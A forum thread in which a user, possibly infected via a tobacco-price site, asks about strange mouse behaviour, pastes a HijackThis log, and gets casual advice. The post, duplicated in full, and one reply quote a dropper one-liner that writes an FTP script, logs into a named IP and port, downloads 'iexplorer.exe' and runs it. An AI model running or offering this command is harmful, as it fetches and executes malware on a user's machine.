Options
Need Virus/Flash/Drive-by expert help
RobinOfLoxley
Posts: 27,040
Forum Member
✭✭✭
Yesterday, with my brother going to Munich I wondered if I could get a 200 cheap ciggies. Googled "germany cigarette prices". Advanced search, in the last month.
I clicked on this link I think (from Google search) which i think may have given me the problem.
DON'T CLICK IT!!
How I saved the link...
PossibleDodgyLink_CD4zEvWx.htm.part.htm
or what I clicked from Google search page
ww.tobaccotoday.info/.../retail-cigarette-brand-prices-around-the-world/
Immediately my mouse started smooth'ish scrolling/dancing all over the screen. I couldn't close tab or quit Firefox.
I turned laptop off by holding power button down.
Now...
My security is..
WOT...I could see the site was 'unknown' but not registered as dangerous. Many are like that.
I have Avira as my main AV, SAS running alongside (real time +manual scans)
WinPatrol in background and my W7 Home UAC was on max.
Not one warning.
Ok I thought, just a Flash scare. Laptop rebooted normally and I ran Malwarebytes, SAS and Avira full scans, one at a time.
Took most of yesterday evening.
All are clear, zero detections or suspicious.
My laptop and all its .exes are working. System restore is working. (save only, not tried a restore, it's a week old. I want to be sure I am clean)
But while they were chugging away, I thought I would do a MozBackup of my Firefox bookmarks.
MozBackup asks where yo want to save your backup so I browsed to a new location.
The normal windows Save As dialog came up but text started scrolling along the text box like a tickertape. Abot 2 chars per second.
I shut it down, by Task Manager.
Ran it again and fine. Continued browsing digispy as I often do of an evening.
Then nothing for a couple of hours and then this echoed into a new text document I had just opened...
ystemroot%\system32\cmd.exe
del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Partial echo since it says ystem not system.
Tried googling 186.84.116.149 and 3944. No inspiration.
Today has been fine.
NetWorx shows no unusual traffic via my router.
.
I am at a loss.
Why has all my security failed to pick up a hijacked mouse and those 'echos'?
I have a system image from a week ago. And another image as well. So no danger of loss of data, but I am really intrigued/worried.
Specifically, what is that code?
Seeing as I have exhausted many security apps, last one I haven't tried is ComboFix. May try that, but not tried it on this laptop. If it buggers it up, I have saved MBRs, bootCDs , W7 Home DVDs and two images.
I don't want to use HijackThis unless I have to.
I clicked on this link I think (from Google search) which i think may have given me the problem.
DON'T CLICK IT!!
How I saved the link...
PossibleDodgyLink_CD4zEvWx.htm.part.htm
or what I clicked from Google search page
ww.tobaccotoday.info/.../retail-cigarette-brand-prices-around-the-world/
Immediately my mouse started smooth'ish scrolling/dancing all over the screen. I couldn't close tab or quit Firefox.
I turned laptop off by holding power button down.
Now...
My security is..
WOT...I could see the site was 'unknown' but not registered as dangerous. Many are like that.
I have Avira as my main AV, SAS running alongside (real time +manual scans)
WinPatrol in background and my W7 Home UAC was on max.
Not one warning.
Ok I thought, just a Flash scare. Laptop rebooted normally and I ran Malwarebytes, SAS and Avira full scans, one at a time.
Took most of yesterday evening.
All are clear, zero detections or suspicious.
My laptop and all its .exes are working. System restore is working. (save only, not tried a restore, it's a week old. I want to be sure I am clean)
But while they were chugging away, I thought I would do a MozBackup of my Firefox bookmarks.
MozBackup asks where yo want to save your backup so I browsed to a new location.
The normal windows Save As dialog came up but text started scrolling along the text box like a tickertape. Abot 2 chars per second.
I shut it down, by Task Manager.
Ran it again and fine. Continued browsing digispy as I often do of an evening.
Then nothing for a couple of hours and then this echoed into a new text document I had just opened...
ystemroot%\system32\cmd.exe
del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Partial echo since it says ystem not system.
Tried googling 186.84.116.149 and 3944. No inspiration.
Today has been fine.
NetWorx shows no unusual traffic via my router.
.
I am at a loss.
Why has all my security failed to pick up a hijacked mouse and those 'echos'?
I have a system image from a week ago. And another image as well. So no danger of loss of data, but I am really intrigued/worried.
Specifically, what is that code?
Seeing as I have exhausted many security apps, last one I haven't tried is ComboFix. May try that, but not tried it on this laptop. If it buggers it up, I have saved MBRs, bootCDs , W7 Home DVDs and two images.
I don't want to use HijackThis unless I have to.
0
Comments
Why don't you want to run HijackThis? It's a simple logging program which will show you what's running on your system and It might reveal exactly what's going on. No changes are made unless you click the 'FIx' button.
Personally though, I would just restore from the image and not bother with any other scans.
Worth a run of this although you do seem to have covered most options.
Picked out a 150 threats in the first minute of scan (1%) on my system.
I am only looking for one possible threat that has evaded MBM, SAS, Avira and WinPatrol.
Read through the Stopzilla reviews at
http://download.cnet.com/Stopzilla/3000-8022_4-10104765.html?tag=mncol;1
Ignore the good ones. I agree with "DECEPTIVE"
=====================================
ystemroot%\system32\cmd.exe
del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Like Max, the link didn't have any bad effects on my pc also using Avira.
A hijackthis log wouldn't be a bad idea.
Sorry, no idea about the code.
No idea how to interpret it. I leave it here for safekeeping.
Point me to a Hijack moderator site, unless you spot anything yourself.
(non Hijack peeps..pls browse past this post, it's just a cut and paste.)
===================
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:53:59, on 10/12/2010
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16671)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\Common Files\Seagate\Schedule2\schedhlp.exe
C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
G:\Program Files (x86)\Uniblue\ProcessQuickLink 2\ProcessQuickLink2.exe
C:\Program Files (x86)\Hp\QuickPlay\QPService.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Freecorder\FLVSrvc.exe
C:\Users\Bradham\AppData\Roaming\Dropbox\bin\Dropbox.exe
G:\Program Files (x86)\Seagate\DiscWizard\DiscWizardMonitor.exe
G:\Program Files (x86)\Seagate\DiscWizard\TimounterMonitor.exe
C:\Program Files (x86)\TightVNC\tvnserver.exe
C:\Program Files (x86)\RealVNC\VNC4\winvnc4.exe
G:\Program Files (x86)\NetWorx\networx.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Users\Bradham\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_GB&c=94&bd=Presario&pf=cnnb
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Freecorder Toolbar - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - C:\Program Files (x86)\Freecorder\tbFree.dll
F2 - REG:system.ini: UserInit=c:\windows\syswow64\userinit.exe,
O1 - Hosts: ::1 localhost
O2 - BHO: Shareaza Web Download Hook - {0EEDB912-C5FA-486F-8334-57288578C627} - g:\Program Files (x86)\Shareaza\RazaWebHook32.dll
O2 - BHO: Freecorder Toolbar - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - C:\Program Files (x86)\Freecorder\tbFree.dll
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll
O2 - BHO: AOL Toolbar BHO - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} - C:\Program Files (x86)\AOL\AOL Toolbar 5.0\aoltb.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files (x86)\Google\GoogleToolbarNotifier\5.6.5612.1312\swg.dll
O2 - BHO: WOT Helper - {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} - C:\Program Files (x86)\WOT\WOT.dll
O2 - BHO: Bing Bar BHO - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2322.0\npwinext.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - G:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O3 - Toolbar: AOL Toolbar - {DE9C389F-3316-41A7-809B-AA305ED9D922} - C:\Program Files (x86)\AOL\AOL Toolbar 5.0\aoltb.dll
O3 - Toolbar: Freecorder Toolbar - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - C:\Program Files (x86)\Freecorder\tbFree.dll
O3 - Toolbar: WOT - {71576546-354D-41c9-AAE8-31F2EC22BF0D} - C:\Program Files (x86)\WOT\WOT.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O3 - Toolbar: @C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2322.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2322.0\npwinext.dll
O4 - HKLM\..\Run: [QPService] "C:\Program Files (x86)\HP\QuickPlay\QPService.exe"
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files (x86)\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [UpdatePRCShortCut] "C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Hewlett-Packard\Recovery" UpdateWithCreateOnce "Software\CyberLink\PowerRecover"
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [WirelessAssistant] C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [avgnt] "C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [WinPatrol] C:\Program Files (x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot
O4 - HKLM\..\Run: [Freecorder FLV Service] "C:\Program Files (x86)\Freecorder\FLVSrvc.exe" /run
O4 - HKLM\..\Run: [DiscWizardMonitor.exe] G:\Program Files (x86)\Seagate\DiscWizard\DiscWizardMonitor.exe
O4 - HKLM\..\Run: [AcronisTimounterMonitor] G:\Program Files (x86)\Seagate\DiscWizard\TimounterMonitor.exe
O4 - HKLM\..\Run: [tvncontrol] "C:\Program Files (x86)\TightVNC\tvnserver.exe" -controlservice -slave
O4 - HKLM\..\Run: [NetWorx] "g:\Program Files (x86)\NetWorx\networx.exe" /auto
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [swg] "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Google Update] "C:\Users\Bradham\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [Uniblue ProcessQuickLink 2] "g:\Program Files (x86)\Uniblue\ProcessQuickLink 2\ProcessQuickLink2.exe" /autostart
O4 - HKCU\..\Run: [SUPERAntiSpyware] G:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Startup: Canon IJ Status Monitor Canon MP250 series Printer on TOWER2002.lnk = ?
O4 - Startup: Dropbox.lnk = Bradham\AppData\Roaming\Dropbox\bin\Dropbox.exe
O4 - Startup: Run VNC Server.lnk = C:\Program Files (x86)\RealVNC\VNC4\winvnc4.exe
O4 - Startup: SpeedFan.lnk = C:\Program Files (x86)\SpeedFan\speedfan.exe
O4 - Startup: taskmgr.exe.lnk = C:\Windows\System32\taskmgr.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O8 - Extra context menu item: &AOL Toolbar Search - C:\ProgramData\AOL\ieToolbar\resources\en-GB\local\search.html
O8 - Extra context menu item: Download with &Shareaza - res://g:\Program Files (x86)\Shareaza\RazaWebHook32.dll/3000
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~4\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files (x86)\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Protocol: wot - {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - C:\Program Files (x86)\WOT\WOT.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - G:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
O23 - Service: Andrea ST Filters Service (AESTFilters) - Andrea Electronics Corporation - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_ccf0dd3cb081af84\AESTSr64.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) - Avira GmbH - C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: GameConsoleService - WildTangent, Inc. - C:\Program Files (x86)\HP Games\HP Game Console\GameConsoleService.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Seagate Scheduler2 Service (SgtSch2Svc) - Seagate - C:\Program Files (x86)\Common Files\Seagate\Schedule2\schedul2.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Audio Service (STacSV) - IDT, Inc. - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_ccf0dd3cb081af84\STacSV64.exe
O23 - Service: TightVNC Server (tvnserver) - GlavSoft LLC. - C:\Program Files (x86)\TightVNC\tvnserver.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files (x86)\RealVNC\VNC4\WinVNC4.exe
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 13700 bytes
Mouse moving about side to side all over the shop can be quite common and don't think it's anything to worry about TBO.
Have backed up emails and bookmarks. Haven't done anything else in that time.